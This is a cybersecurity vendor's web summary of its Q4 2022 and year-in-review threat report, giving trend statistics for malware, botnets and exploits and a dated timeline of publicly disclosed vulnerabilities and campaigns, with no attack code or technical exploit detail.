Interactive Report Summary

Q4 2022 and Year in Review Threat Report

2022 was a record-breaking year for cyber threats. While Q4 had dips across all three sectors that Nuspire monitors (malware, botnets and exploits), when examining the year’s total threats compared to 2021, we saw an overall surge in threat activity. Learn more about the biggest threats we saw in Q4, plus get a breakdown of how each category we measure compares to 2021.  
Download the Report

Top Findings at a Glance

MALWARE

Malware activity grew YoY despite decrease in Q4

Malware grew 6.85% in 2022

BOTNET

Botnet activity jumped over 30% in 2022

Torpig Mebroot captures 40.26% of all 2022 botnet activity

EXPLOIT

Exploits nearly doubled in 2022

Brute forcing dominates Q4, increasing nearly 400% over Q3

Nuspire - Security Team

Cyberattack Spotlight: Remote Code Execution

Remote code execution (RCE) is a favorite tool of cyber criminals because it allows them to gain access to a user’s data without needing physical access to the network. This means the adversary can steal data, cause service disruption, deploy ransomware and move laterally to other areas in the network.  

Notable RCE vulnerabilities announced in Q4 include: 
Microsoft Exchange, ConnectWise, Microsoft Windows and Microsoft SPNEGO  

Methodology

How Nuspire produces its threat intelligence 

Hover over tiles to learn more

GATHER

Collects threat intelligence and data from global sources, client devices and reputable third parties.

PROCESS

Data is analyzed by a combination of machine learning, algorithm scoring and anomaly detection.

DETECT

Using Nuspire’s cloud-based SIEM, log data is ingested and alerts the security operations center (SOC). The SOC then notifies the client and works with them to remediate the threat.

EVALUATE

Analysts further scrutinize the research, scoring and tracking of existing and new threats.

DISSEMINATE

Analysts leverage the insights to constantly improve the SOC, alerting, and the community through the creation of detection rules, briefs, and presentations.

Q4 2022 in Review

October through December

Timeline graphic

October 3

On-Premises Microsoft Exchange Zero-Day Vulnerabilities Being Actively Exploited 

October 7

Fortinet Announces Critical Authentication Bypass Vulnerability 

October 27

OpenSSL Pre-Announces Critical Vulnerability Patch 

November 1

OpenSLL Releases Security Patch Downgrading Vulnerability from “Critical” to “High” 

November 3

ConnectWise Server Backup Solution Reports Critical Remote Code Execution (RCE) Vulnerability 

November 9

Microsoft Fixes 6 Actively Exploited Vulnerabilities 

November 15

Massive Redirect Malware Campaign Affects 15,000 WordPress Sites 

December 2

Black Basta Ransomware Group Actively Targeting U.S. Companies Using QakBot Malware 

December 7

SiriusXM Vulnerability Allows Hackers to Remotely Unlock and Start Cars 

December 12

Fortinet Announces Critical Buffer Overflow Vulnerability in FortiOS 

December 14

Microsoft Reclassifies SPNEGO Extended Negotiation Security Mechanism Vulnerability as Critical 

December 15

Citrix ADC and Gateway Zero-Day Under Active Exploitation 

December 29

New RisePro Information-Stealing Malware Increasingly Popular Among Cybercriminals 

Let's Dive Into the Data

While some threat activity declined in Q4 2022, all activity significantly increased year-over-year 

#
Activity
Average
0

Total Events

0

Unique Variants

-0.56%

Total Activity

Malware

We observed a decrease in malware activity when compared to the previous quarter, most likely due to the continuing effects of Microsoft’s decision to block Visual Basic for Applications (VBA) macros by default for Office files.

It’s important to note that year-over-year, malware usage is still high, increasing 6.85% in 2022. Phishing is far and away the most popular delivery method for malware, and in Q4, we saw threat actors shift to using Excel add-in (.XLL) files and JavaScript variants.

#
Activity
Average
0

Total Events

0

Unique Variants

-0.35%

Total Activity

Botnets

Botnet activity in Q4 dropped significantly; however, overall activity for 2022 jumped over 30% when compared to 2021.

Torpig Mebroot is a repeat offender on Nuspire’s Quarterly Threat Reports and has appeared once again in the top position in Q4. Even with a substantial decrease in activity (60.34%), Torpig Mebroot still captured just shy of 60% of all witnessed botnet activity during Q4.

#
Activity
Average
0

Total Events

0

Unique Variants

0.59%

Total Activity

Exploits

Nuspire witnessed a surge in brute forcing in Q4, with activity increasing by a whopping 400% over Q3. In a distant second place, we saw continued exploitation of Apache’s Log4j vulnerability – a vulnerability that shook the industry to its core in December 2021 and continues to wreak havoc today.

Our analysis also uncovered that the Hikvision security camera vulnerability announced in October 2021 saw a resurgence in exploit attempts in Q4. Our experts predict we’ll see more of these IoT attacks throughout 2023.

Stay Vigilant

Activity across all three sectors rose in 2022. Even with vendors taking actions to minimize attack vectors, such as Microsoft disabling VBA macros by default, threat actors have evolved and shifted their methods. Download the full report to find out how you can prepare and tighten your security controls around the expected challenges highlighted by our security experts. 
Download the Report